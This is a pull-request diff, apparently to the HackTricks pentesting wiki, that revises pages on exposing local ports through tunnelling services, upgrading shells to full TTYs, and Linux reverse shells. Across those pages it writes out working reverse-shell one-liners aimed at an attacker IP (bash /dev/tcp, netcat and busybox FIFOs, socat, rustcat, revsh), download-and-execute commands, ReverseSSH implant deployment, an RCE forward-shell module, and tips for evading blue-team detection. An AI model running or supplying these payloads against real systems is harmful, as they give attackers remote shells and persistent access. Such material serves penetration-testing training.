### PR TITLE
Review references for batch 003

### DIFF
--- a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md
+++ b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md
@@ -1,24 +1,22 @@
 # Expose local to the internet
 
-{{#include ../../banners/hacktricks-training.md}}
-
 **The goal of this page is to propose alternatives that allow AT LEAST to expose local raw TCP ports and local webs (HTTP) to the internet WITHOUT needing to install anything in the other server (only in local if needed).**
 
 ## **Serveo**
 
-From [https://serveo.net/](https://serveo.net/), it allows several http and port forwarding features **for free**.
+Serveo's documentation describes SSH forwarding for HTTP endpoints and private/public TCP forwarding; requesting a non-80/443 public TCP port (including port 0 for a random port) requires a registered user.<sup>[[1]](#references)</sup>
 
 ```bash
 # Get a random port from serveo.net to expose local port 4444
 ssh -R 0:localhost:4444 serveo.net
 
-# Expose a web listening in localhost:300 in a random https URL
+# Expose a web listening in localhost:3000 in a random https URL
 ssh -R 80:localhost:3000 serveo.net
 ```
 
 ## SocketXP
 
-From [https://www.socketxp.com/download](https://www.socketxp.com/download), it allows to expose tcp and http:
+SocketXP's getting-started guide documents `socketxp connect tcp://localhost:22` and `socketxp connect http://localhost:8080` for TCP and HTTP tunnels; the agent is authenticated with a portal token first.<sup>[[2]](#references)</sup>
 
 ```bash
 # Expose tcp port 22
@@ -30,19 +28,19 @@ socketxp connect http://localhost:8080
 
 ## Ngrok
 
-From [https://ngrok.com/](https://ngrok.com/), it allows to expose http and tcp ports:
+ngrok's CLI documents HTTP and TCP tunnels; its FAQ says free-tier TCP endpoints require a valid payment method and that the card is not charged.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
-# Expose web in 3000
+# Expose a local web service on port 8000
 ngrok http 8000
 
-# Expose port in 9000 (it requires a credit card, but you won't be charged)
+# Expose a local TCP service on port 9000
 ngrok tcp 9000
 ```
 
 ## Telebit
 
-From [https://telebit.cloud/](https://telebit.cloud/) it allows to expose http and tcp ports:
+The legacy Telebit.js CLI help documents `telebit http <port>` for HTTPS forwarding and `telebit tcp <local> [remote]` for raw TCP; availability depends on the deployment and relay.<sup>[[5]](#references)</sup>
 
 ```bash
 # Expose web in 3000
@@ -54,31 +52,31 @@ From [https://telebit.cloud/](https://telebit.cloud/) it allows to expose http a
 
 ## LocalXpose
 
-From [https://localxpose.io/](https://localxpose.io/), it allows several http and port forwarding features **for free**.
+LocalXpose's current site documents `loclx tunnel http --to 3000`, lists HTTP/TLS/TCP/UDP support, and says the free plan covers personal/light commercial use while TCP tunneling is a paid-plan capability.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
-# Expose web in port 8989
-loclx tunnel http -t 8989
+# Expose a local web service on port 8989
+loclx tunnel http --to 8989
 
-# Expose tcp port in 4545 (requires pro)
-loclx tunnel tcp --port 4545
+# Expose a local TCP service on port 4545 (paid plan)
+loclx tunnel tcp --to 4545
 ```
 
 ## Expose
 
-From [https://expose.dev/](https://expose.dev/) it allows to expose http and tcp ports:
+Expose documents `expose share` for HTTP/HTTPS local URLs and a PRO-only `expose share-port` command for TCP ports.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
-# Expose web in 3000
+# Expose a local HTTP service on port 3000
 ./expose share http://localhost:3000
 
-# Expose tcp port in port 4444 (REQUIRES PREMIUM)
+# Expose a local TCP service on port 4444 (PRO)
 ./expose share-port 4444
 ```
 
 ## Localtunnel
 
-From [https://github.com/localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) it allows to expose http for free:
+The official localtunnel repository describes exposing localhost for testing and documents the NPX command below.<sup>[[10]](#references)</sup>
 
 ```bash
 # Expose web in port 8000
@@ -87,24 +85,26 @@ npx localtunnel --port 8000
 
 ## Cloudflare Tunnel (cloudflared)
 
-Cloudflare's `cloudflared` CLI can create unauthenticated "Quick" tunnels for fast demos or named tunnels bound to your own domain/hostnames. It supports HTTP(S) reverse proxies as well as raw TCP mappings routed through Cloudflare's edge.<sup>[[1]](#references)</sup>
+Cloudflare's current docs show unauthenticated "Quick" tunnels for local development, and the product overview lists HTTP, HTTPS, TCP, SSH, and RDP among supported published protocols.<sup>[[11]](#references)[[12]](#references)</sup>
+
+For a locally managed named tunnel, Cloudflare documents the `tunnel login`, `create`, `route dns`, and `--config ... run ...` workflow.<sup>[[13]](#references)[[14]](#references)[[17]](#references)</sup>
 
 ```bash
 # Quick Tunnel exposing localhost:8080 (random trycloudflare subdomain)
 cloudflared tunnel --url http://localhost:8080
 
 # Named tunnel bound to a DNS record
-cloudflared tunnel login                       # one-time device auth
+cloudflared tunnel login                       # authenticate with Cloudflare
 cloudflared tunnel create my-tunnel
 cloudflared tunnel route dns my-tunnel app.example.com
-cloudflared tunnel run my-tunnel --config tunnel.yml
+cloudflared tunnel --config tunnel.yml run my-tunnel
 ```
 
-Named tunnels let you define multiple ingress rules (HTTP, SSH, RDP, etc.) inside `tunnel.yml`, support per-service access policies via Cloudflare Access, and can run as systemd containers for persistence. Quick Tunnels are anonymous and ephemeral—great for phishing payload staging or webhook tests, but Cloudflare does not guarantee uptime.<sup>[[1]](#references)</sup>
+Named tunnels can define multiple ingress rules in YAML; Cloudflare Access policies can control access to published applications, and Cloudflare documents service and Docker deployment paths for running connectors. Quick Tunnels are anonymous, temporary testing tunnels with a 200-concurrent-request limit and no Server-Sent Events (SSE) support.<sup>[[11]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 ## Tailscale Funnel / Serve
 
-Tailscale v1.52+ ships unified `tailscale serve` (share inside the tailnet) and `tailscale funnel` (publish to the wider internet) workflows. Both commands can reverse proxy HTTP(S) or forward raw TCP with automatic TLS and short `*.ts.net` hostnames.<sup>[[3]](#references)</sup>
+Tailscale's current CLI uses Serve for tailnet-only sharing and Funnel for public sharing. The commands support HTTP/HTTPS reverse-proxy targets and TCP forwarding; Funnel's raw TCP mode is limited to ports 443, 8443, and 10000.<sup>[[18]](#references)[[19]](#references)</sup>
 
 ```bash
 # Share localhost:3000 within the tailnet
@@ -117,21 +117,21 @@ sudo tailscale funnel --https=443 localhost:3000
 sudo tailscale funnel --tcp=10000 tcp://localhost:22
 ```
 
-Use `--bg` to persist the configuration without keeping a foreground process, and `tailscale funnel status` to audit what services are reachable from the public internet. Because Funnel terminates TLS on the local node, any credential prompts, headers, or mTLS enforcement can stay under your control.
+Use `--bg` to persist the configuration without keeping a foreground process, and use `tailscale funnel status` to audit what services are reachable from the public internet. For HTTPS Funnel targets, Tailscale documents TLS termination on the local node before forwarding the request to the local service.<sup>[[18]](#references)[[19]](#references)</sup>
 
 ## Fast Reverse Proxy (frp)
 
-`frp` is a self-hosted option where you control the rendezvous server (`frps`) and the client (`frpc`). It is great for red teams that already own a VPS and want deterministic domains/ports.
+`frp` is a self-hosted option where you control the rendezvous server (`frps`) and the client (`frpc`); its documentation covers forwarding local services behind NAT or a firewall with deterministic remote ports/domains.<sup>[[20]](#references)</sup>
 
 <details>
 <summary>Sample frps/frpc configuration</summary>
 
 ```bash
-# Server: bind TCP/HTTP entry points and enable dashboard
+# Server: start frps with its server configuration
 ./frps -c frps.toml
 
-# Client: forward local 22 to remote port 6000 and a web app to vhost
-./frpc -c <<'EOF'
+# Client: save this as frpc.toml, then start it
+cat > frpc.toml <<'EOF'
 serverAddr = "c2.example.com"
 serverPort = 7000
 
@@ -148,33 +148,52 @@ type = "http"
 localPort = 8080
 customDomains = ["panel.example.com"]
 EOF
+./frpc -c frpc.toml
 ```
 
 </details>
 
-Recent releases add QUIC transport, token/OIDC auth, bandwidth caps, health checks, and Go-template-based range mappings—useful for quickly standing up multiple listeners that map back to implants on different hosts.<sup>[[4]](#references)</sup>
+The current project documentation includes QUIC transport, token/OIDC authentication, bandwidth limits, health checks, and Go-template range mappings—consult the release matching your deployment before using any of those options.<sup>[[20]](#references)</sup>
 
 ## Pinggy (SSH-based)
 
-Pinggy provides SSH-accessible tunnels over TCP/443, so it works even behind captive proxies that only allow HTTPS. Sessions last 60 minutes on the free tier and can be scripted for quick demos or webhook relays.<sup>[[5]](#references)</sup>
+Pinggy documents SSH reverse forwarding over port 443, so it can work in networks where outbound SSH on port 22 is blocked. Its free plan times out after 60 minutes and uses a new URL after reconnecting, while Pro adds persistent tunnels and custom domains.<sup>[[21]](#references)[[22]](#references)</sup>
 
 ```bash
 # Random subdomain exposing localhost:3000 via SSH reverse tunnel
-ssh -p 443 -R0:localhost:3000 a.pinggy.io
+ssh -p 443 -R0:localhost:3000 qr@free.pinggy.io
 ```
 
-You can request custom domains and longer-lived tunnels on the paid tier, or recycle tunnels automatically by wrapping the command in a loop.
+You can request custom domains and persistent tunnels on Pro.<sup>[[22]](#references)</sup> You can recycle temporary tunnels automatically by wrapping the command in a loop.
 
 ## Threat intel & OPSEC notes
 
-Adversaries have increasingly abused ephemeral tunneling (especially Cloudflare's unauthenticated `trycloudflare.com` endpoints) to stage Remote Access Trojan payloads and hide C2 infrastructure. Proofpoint tracked campaigns since February 2024 that pushed AsyncRAT, Xworm, VenomRAT, GuLoader, and Remcos by pointing download stages to short-lived TryCloudflare URLs, making traditional static blocklists far less effective. Consider rotating tunnels and domains proactively, but also monitor for telltale external DNS lookups to the tunneler you are using so you can spot blue-team detection or infrastructure blocking attempts early.<sup>[[2]](#references)</sup>
+Adversaries have abused ephemeral tunneling, including Cloudflare's unauthenticated `trycloudflare.com` endpoints, to deliver Remote Access Trojans through temporary infrastructure. Proofpoint reported activity first observed in February 2024 involving Xworm, AsyncRAT, VenomRAT, GuLoader, and Remcos, and noted that temporary tunnels complicate defenses relying on static blocklists.<sup>[[23]](#references)</sup> Consider rotating tunnels and domains proactively, and monitor for telltale external DNS lookups to the tunneler you are using so you can spot blue-team detection or infrastructure blocking attempts early.
 
 ## References
 
-- [1] [Cloudflare Docs - Create a locally-managed tunnel](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/local-management/create-local-tunnel/)
-- [2] [Proofpoint - Threat Actor Abuses Cloudflare Tunnels to Deliver RATs](https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats)
-- [3] [Tailscale - Reintroducing Serve and Funnel](https://tailscale.com/blog/reintroducing-serve-funnel)
-- [4] [fatedier/frp - Fast Reverse Proxy repository](https://github.com/fatedier/frp)
-- [5] [Pinggy Documentation - Usage](https://pinggy.io/docs/usages/)
+- [1] [Serveo Documentation](https://serveo.net/docs/)
+- [2] [SocketXP Documentation - Getting Started](https://docs.socketxp.com/guide/getting-started/getting-started/)
+- [3] [ngrok Agent Command Line Interface](https://ngrok.com/docs/agent/cli)
+- [4] [ngrok FAQ](https://ngrok.com/docs/faq)
+- [5] [Telebit.js legacy CLI help](https://git.rootprojects.org/root/telebit.js/src/commit/4aaa87fd6ca5a8b149ce4a5f9d7b22ee5052f5d7/lib/en-us.toml)
+- [6] [LocalXpose](https://localxpose.io/)
+- [7] [LocalXpose Documentation](https://localxpose.gitbook.io/docs)
+- [8] [Expose - Sharing sites](https://expose.dev/docs/client/sharing)
+- [9] [Expose - Sharing TCP ports](https://github.com/exposedev/expose/blob/master/docs/client/sharing-tcp-ports.md)
+- [10] [localtunnel/localtunnel repository](https://github.com/localtunnel/localtunnel)
+- [11] [Cloudflare Docs - Set up Cloudflare Tunnel](https://developers.cloudflare.com/tunnel/setup/)
+- [12] [Cloudflare Tunnel overview](https://developers.cloudflare.com/tunnel/)
+- [13] [Cloudflare Docs - Useful tunnel commands](https://developers.cloudflare.com/tunnel/advanced/local-management/tunnel-useful-commands/)
+- [14] [Cloudflare Docs - Routing](https://developers.cloudflare.com/tunnel/routing/)
+- [15] [Cloudflare Docs - Configuration file](https://developers.cloudflare.com/tunnel/advanced/local-management/configuration-file/)
+- [16] [Cloudflare Access policies](https://developers.cloudflare.com/cloudflare-one/access-controls/policies/)
+- [17] [Cloudflare Docs - Run parameters](https://developers.cloudflare.com/tunnel/advanced/run-parameters/)
+- [18] [Tailscale Serve command](https://tailscale.com/docs/reference/tailscale-cli/serve)
+- [19] [Tailscale Funnel command](https://tailscale.com/docs/reference/tailscale-cli/funnel)
+- [20] [fatedier/frp - Fast Reverse Proxy repository](https://github.com/fatedier/frp)
+- [21] [Pinggy Documentation - Usage](https://pinggy.io/docs/usages/)
+- [22] [Pinggy - Simple Localhost Tunnels](https://pinggy.io/)
+- [23] [Proofpoint - Threat Actor Abuses Cloudflare Tunnels to Deliver RATs](https://www.proofpoint.com/uk/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/generic-hacking/reverse-shells/full-ttys.md
+++ b/src/generic-hacking/reverse-shells/full-ttys.md
@@ -1,30 +1,37 @@
 # Full TTYs
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Full TTY
 
-Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
+`/etc/shells` lists valid login-shell pathnames and is consulted by some programs; it is not a universal prerequisite for allocating a PTY.<sup>[[3]](#references)[[4]](#references)</sup> If a program such as `pkexec` rejects `SHELL` with `The value for the SHELL variable was not found in the /etc/shells file`, ensure the exact shell path (for example, `/bin/bash`) appears in `/etc/shells`.<sup>[[10]](#references)</sup> The `CTRL+Z`/`fg` recovery sequence below uses Bash job control; if the current shell is not Bash, start Bash before using that sequence.<sup>[[7]](#references)</sup>
 
 #### Python
 
+Python's `pty.spawn` starts a program connected to the current process's standard input, output, and error streams, which gives Bash a pseudo-terminal in this session.<sup>[[4]](#references)</sup>
+
 ```bash
 python3 -c 'import pty; pty.spawn("/bin/bash")'
-
-(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
 ```
 
 > [!TIP]
-> You can get the **number** of **rows** and **columns** executing **`stty -a`**
+> You can get the **number** of **rows** and **columns** by running **`stty -a`**; `-a` prints all current terminal settings. The command's output is terminal-specific, so use the values reported by the current session.<sup>[[11]](#references)</sup>
 
 #### script
 
+The `script` utility records a terminal session; here `/dev/null` discards the typescript, `-q` suppresses start and completion messages, and `-c` runs Bash instead of the default shell.<sup>[[5]](#references)</sup>
+
 ```bash
 script /dev/null -qc /bin/bash #/dev/null is to not store anything
+```
+
+After either PTY-spawn method, suspend the Netcat session and restore it with local raw mode, then set the remote terminal environment and dimensions:
+
+```bash
 (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
 ```
 
 #### socat
+
+The listener uses the current terminal in raw mode with local echo disabled and accepts TCP connections on port 4444. The victim command allocates a pty, joins stderr, creates a session, forwards SIGINT, and applies sane terminal settings; add `ctty` if the child needs a controlling terminal.<sup>[[6]](#references)</sup>
 
 ```bash
 #Listener:
@@ -47,15 +54,17 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
 - IRB: `exec "/bin/sh"`
 - vi: `:!bash`
 - vi: `:set shell=/bin/bash:shell`
-- nmap: `!sh`
+- nmap (old versions with `--interactive`): `!sh`
+
+The Nmap escape is version-specific: Nmap removed its `--interactive` mode in later releases, so `!sh` applies only to old versions.<sup>[[13]](#references)</sup>
 
 ## ReverseSSH
 
 A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.<sup>[[1]](#references)</sup>
 
-Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
+Below is an example for `x86` with the project's published UPX-compressed binary. For other architectures or release artifacts, use the [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/) as navigation.<sup>[[1]](#references)</sup>
 
-1. Prepare locally to catch the ssh port forwarding request:
+1. Prepare the local host to catch the incoming SSH connection. In listener mode, `-l` enables the listener and `-p 4444` selects the port on which it accepts the target's connection.<sup>[[1]](#references)</sup>
 
 ```bash
 # Drop it via your preferred way, e.g.
@@ -64,16 +73,13 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
 /dev/shm/reverse-ssh -v -l -p 4444
 ```
 
-- (2a) Linux target:
+- (2a) Linux target. Transfer the same `upx_reverse-sshx86` artifact to `/dev/shm/reverse-ssh` and make it executable. The target's `-p 4444` selects the listener port above, and `kali@10.0.0.2` supplies the account and host used to dial home.<sup>[[1]](#references)</sup>
 
 ```bash
-# Drop it via your preferred way, e.g.
-wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
-
 /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
 ```
 
-- (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
+- (2b) Windows target. Full interactive PowerShell requires Windows 10 build 17763; see the [project README](https://github.com/Fahrj/reverse-ssh#features).<sup>[[1]](#references)</sup>
 
 ```bash
 # Drop it via your preferred way, e.g.
@@ -82,7 +88,9 @@ certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/d
 reverse-ssh.exe -p 4444 kali@10.0.0.2
 ```
 
-- If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
+The Windows example uses `certutil` with `-f -urlcache`; Microsoft documents `-f` as forcing a URL fetch and notes that available parameters vary by version, so check `certutil -?` if this form is unavailable.<sup>[[12]](#references)</sup>
+
+- After the reverse connection succeeds, ReverseSSH's reverse-mode listener binds port `8888` by default (or the value supplied with `-b`), and incoming connections accept any username with the default password `letmeinbrudipls`. The remote shell runs with the privileges of the account that launched `reverse-ssh(.exe)`.<sup>[[1]](#references)</sup>
 
 ```bash
 # Interactive shell access
@@ -94,13 +102,13 @@ sftp -P 8888 127.0.0.1
 
 ## Penelope
 
-[Penelope](https://github.com/brightio/penelope) automatically upgrades Linux reverse shells to TTY, handles the terminal size, logs everything and much more. Also it provides readline support for Windows shells.<sup>[[2]](#references)</sup>
+[Penelope](https://github.com/brightio/penelope) automatically upgrades Unix-like reverse shells to PTY, resizes Unix-like terminals, and logs shell interactions; for Windows shells it provides readline but not real-time terminal resizing.<sup>[[2]](#references)</sup>
 
-![penelope](https://github.com/user-attachments/assets/27ab4b3a-780c-4c07-a855-fd80a194c01e)
+Run `penelope` to listen on `0.0.0.0:4444` by default; incoming Unix-like shells can then be auto-upgraded and logged.<sup>[[2]](#references)</sup>
 
 ## No TTY
 
-If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:
+If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, Expect spawns `sudo`, waits for its password prompt, sends the password, and returns control with `interact`; `sudo -S` reads its password from standard input. Use it only in an authorized lab and avoid placing real credentials in shell history or source files.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
@@ -110,6 +118,16 @@ expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PAS
 
 - [1] [ReverseSSH - Statically-linked ssh server with reverse shell functionality for CTFs and such](https://github.com/Fahrj/reverse-ssh)
 - [2] [Penelope - Shell handler that automates a few things to make life easier](https://github.com/brightio/penelope)
+- [3] [shells(5) — Linux manual page](https://man7.org/linux/man-pages/man5/shells.5.html)
+- [4] [Python `pty` — Python documentation](https://docs.python.org/3/library/pty.html)
+- [5] [script(1) — Linux manual page](https://man7.org/linux/man-pages/man1/script.1.html)
+- [6] [socat(1) — Linux manual page](https://man7.org/linux/man-pages/man1/socat.1.html)
+- [7] [Bash Reference Manual — Job Control](https://www.gnu.org/s/bash/manual/bash.html)
+- [8] [sudo(8) — Linux manual page](https://man7.org/linux/man-pages/man8/sudo.8.html)
+- [9] [expect(1) — Linux manual page](https://man7.org/linux/man-pages/man1/expect.1.html)
+- [10] [pkexec.c](https://github.com/polkit-org/polkit/blob/main/src/programs/pkexec.c)
+- [11] [stty(1) — Linux manual page](https://man7.org/linux/man-pages/man1/stty.1.html)
+- [12] [certutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)
+- [13] [Nmap Change Log](https://nmap.org/changelog.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/generic-hacking/reverse-shells/linux.md
+++ b/src/generic-hacking/reverse-shells/linux.md
@@ -1,12 +1,12 @@
 # Shells - Linux
 
-{{#include ../../banners/hacktricks-training.md}}
-
-**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)
+**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com/).<sup>[[9]](#references)</sup>
 
 ## Full TTY
 
 **Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
+
+The baseline reverse-shell payloads collected below are also documented in the HighOn.Coffee and PayloadsAllTheThings cheat sheets; verify interpreter and utility availability on the target before selecting one.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ## Bash | sh
 
@@ -38,6 +38,8 @@ echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMSc
 
 #### Shell explanation
 
+The following points summarize Bash's documented interactive and redirection behavior:<sup>[[10]](#references)[[11]](#references)</sup>
+
 1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
 2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
 3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: This is a special file that **represents a TCP connection to the specified IP address and port**.
@@ -53,11 +55,11 @@ wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.s
 
 ## Forward Shell
 
-When dealing with a **Remote Code Execution (RCE)** vulnerability within a Linux-based web application, achieving a reverse shell might be obstructed by network defenses like iptables rules or intricate packet filtering mechanisms. In such constrained environments, an alternative approach involves establishing a PTY (Pseudo Terminal) shell to interact with the compromised system more effectively.
+When RCE is available but a reverse shell is blocked by a firewall, NAT, or outbound filtering, a forward shell over the RCE channel can provide a semi-interactive session.<sup>[[12]](#references)</sup>
 
-A recommended tool for this purpose is [toboggan](https://github.com/n3rada/toboggan.git), which simplifies interaction with the target environment.
+A recommended tool for this purpose is [toboggan](https://github.com/n3rada/toboggan.git), which wraps a command-execution primitive in an interactive session.<sup>[[12]](#references)</sup>
 
-To utilize toboggan effectively, create a Python module tailored to the RCE context of your target system. For example, a module named `nix.py` could be structured as follows:
+To use toboggan, create a Python module tailored to the RCE context of your target system; its module interface expects an `execute(command, timeout)` function that returns command output.<sup>[[12]](#references)</sup> For example, a module named `nix.py` could be structured as follows:
 
 ```python3
 import jwt
@@ -83,23 +85,23 @@ def execute(command: str, timeout: float = None) -> str:
     return response.text
 ```
 
-And then, you can run:
+Run the module with toboggan's current command-line form:<sup>[[12]](#references)</sup>
 
 ```shell
-toboggan -m nix.py -i
+toboggan nix.py
 ```
 
-To directly leverage an interractive shell. You can add `-b` for Burpsuite integration and remove the `-i` for a more basic rce wrapper.
+This starts the interactive session. For the built-in Burp Suite backend, use `toboggan --request burp_request.xml`; for a command-wrapper backend, use `toboggan --exec-wrapper '<command_template>'`.<sup>[[12]](#references)</sup>
 
-Another possibility consist using the `IppSec` forward shell implementation [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).
+Another possibility is the `IppSec` forward-shell implementation [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).<sup>[[13]](#references)</sup>
 
-You just need to modify:
+You need to modify the following parts:<sup>[[13]](#references)</sup>
 
 - The URL of the vulnerable host
 - The prefix and suffix of your payload (if any)
 - The way the payload is sent (headers? data? extra info?)
 
-Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
+Then, you can **send commands** or use the **`upgrade` command** to get a full PTY; the implementation polls the output with an approximate 1.3-second interval.<sup>[[13]](#references)</sup>
 
 ## Netcat
 
@@ -113,7 +115,7 @@ rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <
 
 ## BusyBox
 
-Very common in **routers**, **embedded devices**, **containers**, and stripped-down Linux appliances. If there is no standalone `nc`, check whether BusyBox exposes it:<sup>[[8]](#references)</sup>
+BusyBox combines many utilities into one small executable and is common on small or embedded Linux systems. If there is no standalone `nc`, check whether BusyBox exposes it:<sup>[[8]](#references)[[19]](#references)</sup>
 
 ```bash
 busybox --list-full | grep -E '(^|/)nc$'
@@ -121,7 +123,7 @@ busybox nc <ATTACKER-IP> <PORT> -e /bin/sh
 busybox nc <ATTACKER-IP> <PORT> -e sh
 ```
 
-If `busybox nc` exists but interactive execution is flaky, the FIFO pattern from the `nc` section usually still works:
+If `busybox nc` exists but interactive execution is flaky, adapt the FIFO pattern from the `nc` section to that applet:<sup>[[2]](#references)[[8]](#references)</sup>
 
 ```bash
 rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|busybox nc <ATTACKER-IP> <PORT> >/tmp/f
@@ -129,7 +131,7 @@ rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|busybox nc <ATTACKER-IP> <
 
 ## gsocket
 
-Check it in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
+Check the official deployment instructions at [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/).<sup>[[14]](#references)</sup>
 
 ```bash
 bash -c "$(curl -fsSL gsocket.io/x)"
@@ -152,7 +154,7 @@ rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-I
 while true; do nc -l <port>; done
 ```
 
-To send the command write it down, press enter and press CTRL+D (to stop STDIN)<sup>[[3]](#references)</sup>
+Use the same Enter/CTRL+D input sequence described in the Whois section.<sup>[[3]](#references)</sup>
 
 **Victim**
 
@@ -282,26 +284,25 @@ zsh -c 'zmodload zsh/net/tcp; ztcp <ATTACKER-IP> <PORT>; zsh -i <&$REPLY >&$REPL
 
 ## Rustcat (rcat)
 
-[https://github.com/robiot/rustcat](https://github.com/robiot/rustcat) – modern netcat-like listener written in Rust (packaged in Kali since 2024).<sup>[[5]](#references)</sup>
+[https://github.com/robiot/rustcat](https://github.com/robiot/rustcat) – modern netcat-like listener written in Rust.<sup>[[5]](#references)</sup>
 
 ```bash
-# Attacker – interactive TLS listener with history & tab-completion
+# Attacker – interactive listener with history & tab-completion
 rcat listen -ib 55600
 
-# Victim – download static binary and connect back with /bin/bash
-curl -L https://github.com/robiot/rustcat/releases/latest/download/rustcat-x86_64 -o /tmp/rcat \
+# Victim – download a Linux release binary and connect back with /bin/bash
+curl -L https://github.com/robiot/rustcat/releases/download/v3.0.0/rcat-v3.0.0-linux-x86_64 -o /tmp/rcat \
   && chmod +x /tmp/rcat \
   && /tmp/rcat connect -s /bin/bash <ATTACKER-IP> 55600
 ```
 
-Features:
-- Optional `--ssl` flag for encrypted transport (TLS 1.3)
-- `-s` to spawn any binary (e.g. `/bin/sh`, `python3`) on the victim
-- `--up` to automatically upgrade to a fully interactive PTY
+Features documented by the project include:<sup>[[5]](#references)</sup>
+- Command history and tab completion in interactive mode
+- `-s` to select the shell executable used by `connect`
 
 ## pwncat-cs
 
-If you already have **any raw reverse shell** but want a listener that automatically tries to upgrade it into a more usable session, `pwncat-cs` is a good modern replacement for a plain `nc -lvnp` listener.<sup>[[7]](#references)</sup>
+If you already have **any raw reverse shell** but want a listener that can set up a more usable session, `pwncat-cs` can handle the connection and attempt a remote PTY.<sup>[[7]](#references)</sup>
 
 ```bash
 # Attacker - catch a plain reverse shell and auto-upgrade it when possible
@@ -319,26 +320,26 @@ It also supports **encrypted** `ssl-bind` and `ssl-connect` channels, so you can
 `revsh` is a tiny C client/server that provides a full TTY over an **encrypted Diffie-Hellman tunnel** and can optionally attach a **TUN/TAP** interface for reverse VPN-like pivoting.<sup>[[6]](#references)</sup>
 
 ```bash
-# Build (or grab a pre-compiled binary from the releases page)
+# Build after preparing the OpenSSL dependency as described in the repository README
 git clone https://github.com/emptymonkey/revsh && cd revsh && make
 
-# Attacker – controller/listener on 443 with a pinned certificate
-revsh -c 0.0.0.0:443 -key key.pem -cert cert.pem
+# Attacker – controller/listener on 443
+revsh -c 0.0.0.0:443
 
-# Victim – reverse shell over TLS to the attacker
+# Victim – reverse shell over the encrypted tunnel
 ./revsh <ATTACKER-IP>:443
 ```
 
-Useful flags:
-- `-b` : bind-shell instead of reverse
-- `-p socks5://127.0.0.1:9050` : proxy through TOR/HTTP/SOCKS
-- `-t` : create a TUN interface (reverse VPN)
+Useful flags documented by `revsh` include:<sup>[[6]](#references)</sup>
+- `-b`: bind-shell mode (enable it on both ends)
+- `-D [LHOST:]LPORT` or `-B [RHOST:]RPORT`: dynamic SOCKS 4/4a/5 forwarding
+- `-x`: disable automatic setup of proxies, including the default TUN/TAP setup
 
-Because the entire session is encrypted and multiplexed, it often bypasses simple egress filtering that would kill a plain-text `/dev/tcp` shell.
+The encrypted tunnel avoids exposing shell traffic as plaintext, but it does not bypass network policy by itself.<sup>[[6]](#references)</sup>
 
 ## OpenSSL
 
-A **single-port encrypted reverse shell** is usually more practical than the classic two-listener pattern because it is easier to proxy through `443` and simpler to automate.
